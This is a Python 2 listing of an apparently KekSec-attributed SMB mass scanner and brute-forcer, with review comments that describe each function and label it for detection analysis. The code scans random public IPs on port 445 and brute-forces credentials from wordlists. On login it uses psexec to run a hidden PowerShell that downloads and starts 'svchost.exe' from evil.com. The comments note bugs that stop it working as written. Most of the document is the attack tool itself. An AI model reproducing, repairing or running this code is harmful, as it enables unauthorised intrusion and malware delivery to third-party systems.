KekSec

SMB MASS BRUTER AND EXPLOITER PSEXEC

  1. import os
  2. from pypsexec.client import Client
  3. import socket
  4. import time
  5. import threading
  6. import itertools
  7. import random
  8.  
  9. from impacket.examples.smbclient import MiniImpacketShell
  10. from impacket.smbconnection import SMBConnection
# NOTE(review): this listing is offensive tooling. As written it picks random
# public IPv4 addresses, checks for TCP/445, brute-forces SMB logins from
# user.txt / pass.txt, and on success shells out to psexec to run a hidden
# PowerShell that downloads and starts an executable from a hard-coded URL
# (see testPW). It is Python 2 (raw_input, xrange, list-returning map).
# It is documented here for detection / incident-response analysis only.

# Wordlists are read whole into memory and split on "\n" after stripping "\r".
# A trailing newline in either file therefore yields an empty "" entry, which
# is tried as a username / password like any other line.
fh1=open("user.txt", "r")
fh2=open("pass.txt", "r")
users=fh1.read().replace("\r", "").split("\n")
passwords=fh2.read().replace("\r", "").split("\n")
fh1.close()
fh2.close()
# Process-wide thread budget consulted by brute(). `global` at module level is
# a no-op. globalthreads is incremented/decremented from worker threads in
# testPW() with no lock, so it is only an approximate in-flight count.
global maxthreadsglobal
maxthreadsglobal=500
global globalthreads
globalthreads = 0
  21.  
def testPW(ip, user, passwd, fh):
    # Try one SMB credential against ip:445 and, on success, deploy a payload.
    #
    # ip     -- target host (used as both remote name and remote host).
    # user   -- username from user.txt.
    # passwd -- password from pass.txt.
    # fh     -- shared output file; written to from many threads with no lock.
    #
    # Returns True when the login path completed without raising, False
    # otherwise. Every exception is swallowed by the broad except below, so a
    # network error, a bad password and a programming error all look the same
    # ("T3ST3D").
    #
    # NOTE(review): as pasted this block cannot succeed. The login call uses
    # `username` and `password`, which are neither the parameters (`user`,
    # `passwd`) nor defined anywhere in this file, so it raises NameError on
    # every attempt and the except branch reports "T3ST3D". The psexec line
    # also contains `user + + " -p "` (unary + on a str -> TypeError) and its
    # shell quoting is unbalanced (three unescaped `"`).
    #
    # Detection notes for the deployment path: the command is run through
    # os.popen (a shell) with credentials concatenated unquoted; "psexec \\"
    # in Python source is a single backslash, i.e. `psexec \<ip>`; the child
    # is `powershell -NoP -NonI -W Hidden -Exec Bypass` with a WebClient
    # DownloadFile to %TEMP%\svchost.exe followed by Start-Process. The
    # pypsexec Client imported at the top of the file is never used here.
    global globalthreads
    globalthreads += 1
    try:
        smbClient = SMBConnection(ip, ip, sess_port=445)

        smbClient.login(username, password, '', '', '')
        os.popen("psexec \\" + ip + " -u " + user + + " -p \"" + password + " powershell -NoP -NonI -W Hidden -Exec Bypass \"(New-Object System.Net.WebClient).DownloadFile(\\\"http://evil.com/svchost.exe\\\",\\\"$env:temp\\svchost.exe\\\"); Start-Process \\\"$env:temp\\svchost.exe\\\"\"")
        # Success marker; the same line is appended to the results file.
        print("HAX0RED ----> " + ip + ":" + user + ":" + passwd)
        fh.write("HAX0RED ----> " + ip + ":" + user + ":" + passwd + "\r\n")
        fh.flush()
        globalthreads -= 1
        return True

    except Exception as e:
        # Any failure (auth, network, NameError above) falls through to the
        # "tested" report below.
        pass

    print("T3ST3D ----> " + ip + ":" + user + ":" + passwd)
    globalthreads -= 1
    return False
def brute(ip, fh):
    # Spawn one testPW thread per (user, password) pair against a single host.
    #
    # ip -- target host with TCP/445 open (checked by the caller).
    # fh -- shared results file passed through to testPW.
    #
    # Throttling is a pause, not a join: after every 50 spawns (local counter
    # hits maxthreads exactly), or whenever the unlocked global in-flight count
    # is at/over maxthreadsglobal, the loop sleeps a random 1-9 seconds
    # (randrange(1,10)) and resets the local counter, then keeps spawning. It
    # never waits for outstanding threads to finish, so the global budget can
    # still be exceeded.
    global maxthreadsglobal
    global globalthreads
    print("BRUTING ----> " + ip)
    threads = 0
    maxthreads = 50
    for user in users:
        for passwd in passwords:
            threads += 1
            if threads == maxthreads or globalthreads >= maxthreadsglobal:
                time.sleep(random.randrange(1,10))
                threads = 0
            try:
                t=threading.Thread(target=testPW, args=(ip, user, passwd, fh,))
                t.start()
            except:
                # Thread creation failed (e.g. resource limits): back off once
                # and retry; a second failure silently drops this credential
                # pair.
                time.sleep(random.randrange(1,10))
                try:
                    t=threading.Thread(target=testPW, args=(ip, user, passwd, fh,))
                    t.start()
                except:
                    pass
def Scan(IP):
    # Return True if a TCP connection to IP:445 succeeds within 1 second.
    #
    # The bare except also catches KeyboardInterrupt / SystemExit, so Ctrl-C
    # inside a connect is reported as "port closed" rather than stopping the
    # scan. When connect() raises, s.close() is skipped and the socket is left
    # to garbage collection.
    try:
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(1)
        s.connect((IP, 445))
        s.close()
        return True
    except:
        return False
  73.  
def gen_IP():
    # Return a random dotted-quad IPv4 string used as a scan target.
    #
    # Each octet is drawn from randrange(1,256), i.e. 1..255 (never 0). The
    # first octet is re-drawn while it is in not_valid. That list excludes
    # whole /8s only: 10, 127, 169, 172, 192 and 185. It is not a reserved-
    # range filter -- all of 172/8 and 192/8 are skipped rather than just the
    # RFC 1918 subnets, 185/8 is ordinary public space, and multicast /
    # reserved space (224-255) and other special-use blocks are not excluded.
    not_valid = [10,127,169,172,192,185]
    first = random.randrange(1,256)
    while first in not_valid:
        first = random.randrange(1,256)
    ip = ".".join([str(first),str(random.randrange(1,256)),
    str(random.randrange(1,256)),str(random.randrange(1,256))])
    return ip
  82.  
def gen_IP_block():
    # Return a random /24 in the "a.b.c.0-255" form accepted by ip_range().
    #
    # Same first-octet exclusion list and caveats as gen_IP(); the two
    # functions duplicate that logic. Nothing in this listing calls
    # gen_IP_block -- HaxThread() builds the range string itself from the
    # address returned by gen_IP().
    not_valid = [10,127,169,172,192,185]
    first = random.randrange(1,256)
    while first in not_valid:
        first = random.randrange(1,256)
    ip = ".".join([str(first),str(random.randrange(1,256)),
    str(random.randrange(1,256))])
    return ip+".0-255"
  91.  
def ip_range(input_string):
    # Yield every address in a dotted range such as "1.2.3.0-255".
    #
    # Each octet is either a single number or "lo-hi" (inclusive on both
    # ends); the Cartesian product of the four octet lists is yielded as
    # strings. Python 2 only: `map` returns a list here, so `len(c)` and
    # `c[0]` work. Under Python 3 `map` is an iterator and len() raises.
    # No validation is done on octet values.
    octets = input_string.split('.')
    chunks = [map(int, octet.split('-')) for octet in octets]
    ranges = [range(c[0], c[1] + 1) if len(c) == 2 else c for c in chunks]

    for address in itertools.product(*ranges):
        yield '.'.join(map(str, address))
def HaxThread(fh):
    # Scanner worker: loop forever picking random public IPs and bruting
    # every host found with TCP/445 open. Never returns.
    #
    # fh -- shared results file handed down to brute()/testPW().
    #
    # When a random IP answers on 445, the .2 and .254 addresses of its /24
    # are probed too. If both answer, the author assumes the whole /24 is one
    # server (comment below) and brutes only the original IP; otherwise the
    # entire /24 (0-255) is walked and every responding host is bruted. Note
    # the inner `for IP in ...` rebinds the loop variable. Any exception is
    # printed and the loop continues.
    while 1:
        try:
            IP = gen_IP()
            if Scan(IP):
                if Scan('.'.join(IP.split(".")[:3])+".2") and Scan('.'.join(IP.split(".")[:3])+".254"):#entire ip range most likely pointed to one server
                    brute(IP,fh)
                    continue
                else:
                    for IP in ip_range('.'.join(IP.split(".")[:3])+".0-255"):
                        if Scan(IP):
                            brute(IP,fh)
        except Exception as e:
            print(str(e))
            pass
  114.  
# Entry point (Python 2: raw_input / xrange). Prompts for a worker count,
# opens the results file in append mode and starts that many HaxThread
# workers, all sharing one file handle (no lock; testPW flushes after each
# write). The workers are non-daemon threads that never exit, so the script
# stops by sending signal 9 to its own pid after three Enter presses --
# SIGKILL on POSIX -- which skips any clean shutdown (fh is never closed).
threads = int(raw_input("Threads: "))

fh = open("smb_vulnz.txt","a")
threadcount = 0
for i in xrange(0,threads):
    try:
        threading.Thread(target=HaxThread, args=(fh,)).start()
        threadcount += 1
    except:
        # A thread that fails to start is silently dropped; threadcount only
        # reflects the threads that actually started.
        pass
print("[*] Started " + str(threadcount) + " scanner threads!")
print("Scanning... Press enter 3 times to stop.")

for i in range(0,3):
    raw_input("")

os.kill(os.getpid(),9)
  132.  